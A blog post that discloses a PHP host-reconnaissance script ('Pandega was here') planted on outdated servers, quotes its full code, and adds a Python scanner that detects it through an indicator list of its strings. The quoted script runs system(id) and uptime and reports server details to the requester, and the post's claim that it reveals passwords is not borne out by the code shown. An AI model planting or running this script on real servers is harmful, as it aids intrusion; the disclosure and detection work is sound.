Somebody is trying to cross-link this blog to a security issue in PHP3. The code below will give username and password to the person running the script – if the system is outdated security-wise.
This blog is secured to the extent that the author is comfortable exposing small exploits like this – but be aware: this exploit was found on all the servers Ketil bothered to check. There are more than 200 servers in the logs, so there are quite a lot of outdated servers out there.
```php
<?php
// Human-readable byte counts for the disk figures printed at the bottom
function ConvertBytes($number)
{
    $len = strlen($number);
    if ($len < 4) {
        return sprintf("%d b", $number);
    }
    if ($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if ($len >= 7 && $len < = 9) {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "Pandega<br>";

// Host fingerprinting: kernel string, uptime and the uid the web server runs as.
// The bare words uptime/id are undefined constants that old PHP silently treats as strings.
$un   = @php_uname();
$up   = system(uptime);
$id1  = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
// $SERVER_ADDR only exists with register_globals on (removed in PHP 5.4)
$ip1  = gethostbyname($SERVER_ADDR);

// Disk usage of the current directory
$free1 = diskfreespace($pwd1);
$free  = ConvertBytes(diskfreespace($pwd1));
if (!$free) { $free = 0; }
$all1 = disk_total_space($pwd1);
$all  = ConvertBytes(disk_total_space($pwd1));
if (!$all) { $all = 0; }
$used = ConvertBytes($all1 - $free1);
$os   = @PHP_OS;

// Report everything back to whoever requested the script
echo "Pandega was here ..<br />";
echo "uname -a: $un<br />";
echo "os: $os<br />";
echo "uptime: $up<br />";
echo "id: $id1<br />";
echo "pwd: $pwd1<br />";
echo "php: $php1<br />";
echo "software: $sof1<br />";
echo "server-name: $name1<br />";
echo "server-ip: $ip1<br />";
echo "free: $free<br />";
echo "used: $used<br />";
echo "total: $all<br />";
?>
```
The really unfortunate thing is that this script was located as a text file on the servers checked. I don't know whether PHP files were inserted as well.
It did contain a bit of binary code at the bottom, but that code is NOT shown on this blog.
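The script above is easy to recognise on disk: it carries a fixed set of strings (the "Pandega" banner, the `php_uname`/`system(id)`/`system(uptime)` calls, the disk-space functions) and, as noted, a binary blob after the closing `?>`. The following scanner is an added example written for this post, not code from the blog or from the script's author; it walks a directory, scores every file regardless of extension (the post says the script sat in plain text files), and flags files that match several indicators or that combine indicators with non-text bytes after `?>`. The sample files it writes into a temporary directory are constructed for the demo and not taken from any real server.

```python
import os
import re
import tempfile

# Indicator strings taken from the script quoted in the post above.
INDICATORS = [
    "Pandega was here",
    "php_uname(",
    "system(uptime)",
    "system(id)",
    'getenv("SERVER_SOFTWARE")',
    "diskfreespace(",
    "disk_total_space(",
]

# A file matching at least this many indicators is reported on its own.
THRESHOLD = 3


def score_content(data: bytes) -> dict:
    """Score one file body.

    Returns the matched indicators and whether non-text bytes follow the
    closing ?> tag (the post mentions a binary blob appended to the script).
    """
    text = data.decode("latin-1")  # 1:1 byte-to-char mapping, never raises
    hits = [ind for ind in INDICATORS if ind in text]
    trailing_binary = False
    end = text.rfind("?>")
    if end != -1:
        tail = text[end + 2:]
        # Anything outside printable ASCII and common whitespace after ?> is odd
        trailing_binary = re.search(r"[^\x09\x0a\x0d\x20-\x7e]", tail) is not None
    return {"hits": hits, "trailing_binary": trailing_binary}


def is_suspicious(result: dict) -> bool:
    """Flag on enough indicators, or on any indicator plus a binary tail."""
    enough_hits = len(result["hits"]) >= THRESHOLD
    hits_plus_blob = bool(result["hits"]) and result["trailing_binary"]
    return enough_hits or hits_plus_blob


def scan_tree(root: str) -> list:
    """Return (path, result) for every suspicious file under root.

    Every extension is scanned: the recon script was found stored as a
    text file, so limiting the scan to *.php would miss it.
    """
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1024 * 1024)  # first MiB is plenty for this check
            except OSError:
                continue
            result = score_content(data)
            if is_suspicious(result):
                findings.append((path, result))
    return findings


# Constructed sample files for the demo run (not real server content).
SAMPLE_RECON = (
    b'<?php $un = @php_uname(); $id1 = system(id); $up = system(uptime);\n'
    b'echo "Pandega was here ..<br />"; ?>\n\x00\x01\x02\xff'
)
SAMPLE_BENIGN = b'<?php echo "Hello, world"; ?>\n'


def demo() -> int:
    """Write the samples into a temp dir, scan it, return the number flagged."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "notes.txt"), "wb") as fh:
            fh.write(SAMPLE_RECON)
        with open(os.path.join(root, "index.php"), "wb") as fh:
            fh.write(SAMPLE_BENIGN)
        findings = scan_tree(root)
        for path, result in findings:
            print(path, result["hits"], "binary tail:", result["trailing_binary"])
        return len(findings)


if __name__ == "__main__":
    demo()
```

Run it against a web root instead of the temp directory to get a list of candidate files; the indicator list is deliberately short and specific to this script, so extend it with the strings of whatever variant you actually find rather than with generic PHP function names, which would flag legitimate admin pages.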